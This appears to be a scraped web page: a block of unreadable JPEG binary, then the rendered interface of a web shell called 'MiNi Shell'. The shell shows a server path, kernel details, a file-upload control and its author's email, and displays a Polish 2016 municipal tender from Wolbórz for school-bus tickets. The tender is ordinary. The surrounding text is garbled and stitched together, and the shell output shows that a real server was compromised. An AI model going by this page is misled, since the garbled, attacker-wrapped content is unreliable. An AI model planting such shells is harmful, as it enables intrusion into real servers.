JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160708/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160708/126923-N-2016.html

<p class="kh_header"><b>Wolbórz: Zakup biletów miesięcznych dla dzieci, uczniów
        i młodzieży  dojeżdżających do szkół podstawowych,           gimnazjum i przedszkola w Gminie  Wolbórz,
                          w  dniach 01.09.2016 do 30.06.2017.</b><br>
<b>Numer ogłoszenia: 126923 - 2016; data zamieszczenia: 08.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wolbórz , Pl. Jagiełły 28, 97-320 Wolbórz, woj. łódzkie, tel. 44 6164251, faks 44 6164241.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.wolborz.ugm.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup biletów miesięcznych dla dzieci, uczniów
        i młodzieży  dojeżdżających do szkół podstawowych,           gimnazjum i przedszkola w Gminie  Wolbórz,
                          w  dniach 01.09.2016 do 30.06.2017..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia  jest  zakup biletów miesięcznych  dla dzieci, uczniów i młodzieży, dojeżdzających do szkół podstawowych, gimnazjum i przedszkola  na podstawie   odpłatnych stałych przewozów uczniów według szacunkowej ilości określonej w  SIWZ, z miejsca ich zamieszkania do placówek oświatowych i odwiezienie ich po zajęciach do miejsc oznaczonych przystanków  zlokalizowanych na trasie dowozu  do miejscowości:

      Lubiatów-22 dzieci,  Lubiatów Zakrzew- 7dzieci,  Młynary- 23 dzieci,  Świątniki- 22 dzieci, Psary Lechawa - 3,  Psary Witowskie- 21 dzieci,  Psary Stare - 5 dzieci,  Kuznocin - 20 dzieci, Polichno- 37 dzieci,   Bogusławice wieś- 27 dzieci, Bogusławice PSO-35 dzieci, Brudaki - 10 dzieci,  Komorniki -31 dzieci, Żywocin- 43 dzieci,  Proszenie- 19 dzieci,  Żarnowica - 31 dzieci,  Krzykowice - 4 dzieci, Golesze (Modrzewek,Młoszów,Apolanka) - 18 dzieci;  w oparciu o bilety miesięczne.

     a)   Szacunkowa łączna ilość dzieci na dzień 1 września 2016 r. - 378 . 
b)	Zamawiający dopuszcza możliwość zmiany ilości dzieci, dla których będą zakupione bilety   w miesięcznych okresach rozliczeniowych.  
c)	Szkoły nie zabezpieczają miejsc parkingowych dla autobusów przywożących dzieci .


 2. Przewidywane kursy :
  
Kierunek Proszenie - Psary 
Kurs 1
Na godz. 8.00
Trasa: Polichno Małe (4)- Proszenie (13) - Psary Lechawa (3) - Psary Stare (5) Psary Witowskie (21) = 46
Kurs 2
Odwóz o godz. 14.00 
Wolbórz - Psary Witowskie - Psary Stare - Psary Lechawa - Proszenie SP - Polichno Małe - Polichno Duże - Wolbórz 
Kurs 3
Odwóz o godz. 15.00
Wolbórz - Psary Witowskie - Psary Stare - Psary Lechawa - Proszenie SP  - Proszenie - Polichno Małe - Wolbórz

Kierunek Młynary - Kuznocin 
Kurs 4
Na godz. 8.00
Wolbórz - Świątniki (12) - Lubiatów (11) - Kuznocin (10) - Młynary (13) - Wolbórz = 46
Kurs 5
Na godz. 8.00
Wolbórz - Świątniki (10) - Lubiatów (11) - Zakrzew (7) - Kuznocin (10) - Młynary (10) - Wolbórz = 48
Kurs 6
Odwóz o godz. 13.00
13.00 - Wolbórz - Bogusławice PSO - Świątniki - Lubiatów - Kuznocin - Młynary - Wolbórz 

Kurs 7
Odwóz o godz. 14.00
14.00 - Wolbórz - Świątniki - Lubiatów - Lubiatów Zakrzew - Kuznocin - Młynary - Wolbórz
Kurs 8
Odwóz o godz. 15.00
15.00 - Wolbórz - Świątniki - Lubiatów - Lubiatów Zakrzew - Kuznocin - Młynary - Wolbórz

Kierunek Bogusławice PSO
Kurs 9
Na godz. 8.00
Wolbórz - Bogusławice PSO (28) = 28

Kierunek Golesze - Żarnowica 
Kurs 10
Na godz. 8.00
 Golesze - Żarnowica (15) - Polichno Duże (24) - Wolbórz = 39
Kurs 11
Odwóz o godz. 14.00
14.00 - Wolbórz - Modrzewek - Młoszów - Golesze SP - Żarnowica - Polichno Duże
(18 uczniów 1/2 biletów)

Kierunek Komorniki
Kurs 12
Na godz. 8.00
Wolbórz - Bogusławice PSO (0)- Brudaki (3) - Bogusławice wieś (10) - Dąbrowa - (5) - Komorniki - Komorniki wieś (7) - Żywocin Noworybie (10) - Komorniki - Bogusławice PSO - Krzykowice (4) = 39


Kurs 13
o godz. 14.00
Wolbórz - Komorniki wieś - Żywocin - Noworybie - Komorniki SP - Brudaki - Bogusławice PSO
Kurs 14
Odwóz o godz. 15.00
15.00 - Wolbórz - Krzykowice - Dąbrowa - Komorniki wieś - Żywocin - Noworybie - Komorniki SP - Brudaki - Bogusławice PSO

Dowóz i odwóz uczniów ze SP w Goleszach Dużych 
Kurs 15
Na godz. 7.45
Polichno Duże - Żarnowica (16) - Golesze = 16

Dowóz i odwóz uczniów ze SP w Proszeniu
Kurs 16
Na godz. 8.30 
Wolbórz - Polichno Duże (8) - Polichno Małe (1) - Proszenie (6) = 15

Dowóz i odwóz uczniów ze SP w Komornikach
Kurs 17
Na godz. 8.15
Wolbórz - Bogusławice PSO (7) - Brudaki (7) - Bogusławice wieś (8) - Dąbrowa (4) - Komorniki SP = 26
Kurs 18
Na godz. 8.30
Komorniki SP - Komorniki wieś (24) - Żywocin Noworybie (33) - Komorniki SP = 57
Kurs 19
Odwóz o godz. 13.05
13.05 - Żywocin - Noworybie - Komorniki SP - Bogusławice wieś - Brudaki - Bogusławice PSO - Dąbrowa - Wolbórz SP
 Szacunkowa  dzienna  liczba kilometrów - 372. 

3. Zamawiający zobowiązuje się do zapewnienia opieki podczas dowożenia na podstawie art.17 pkt. 3 ustawy z dnia 7 września 1991 r. o systemie oświaty (tj. z 2004 r. Dz.U Nr 256 poz. 2572 ze zm.).</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.11.31.00-4, 34.98.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeśli Wykonawca na podstawie złożonych dokumentów wykaże, że posiada aktualne licencje na wykonywanie krajowego transportu drogowego osób.
 
Ocena spełniania tego warunku dokonana zostanie na dzień składania ofert zgodnie z zasady spełnia * - nie spełnia *, w oparciu o informacje zawarte w dokumentach i oświadczeniach załączonych do oferty</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeśli Wykonawca na podstawie złożonego wykazu  i dokumentów potwierdzających wykonanie usług wykaże, że w okresie ostatnich 3 lat licząc do dnia składania ofert wykonał minimum 1 usługę transportu zbiorowego  przewozu dzieci do szkół systematycznie w okresie nie krótszym niż 4 miesiące. 
 
Ocena spełnienia warunku dokonana będzie przez Zamawiającego wg zasady spełnia*- nie spełnia*.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeśli Wykonawca na podstawie złożonych dokumentów wykaże, że posiada lub będzie posiadał minimum 6 autobusów - rok produkcji nie wcześniejszy niż 2006 . 
Ocena spełnienia warunku dokonana będzie przez Zamawiającego wg zasady spełnia*- nie spełnia*.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - czs podstawienia pojazdu zastępczego - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewidział możliwość zmiany zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy zamówienia w przypadku :
zmiany stawki podatku VAT przez władzę ustawodawczą w trakcie trwania umowy i wynikającej z tego tytułu zmiany wynagrodzenia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wolborz.4bip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Wolborzu
97-320 Wolbórz; Pl. Jagiełły 28.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.07.2016 godzina 10:00, miejsce: Urząd Miejski w Wolborzu
97-320 Wolbórz; Pl. Jagiełły 28; pokój 3 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com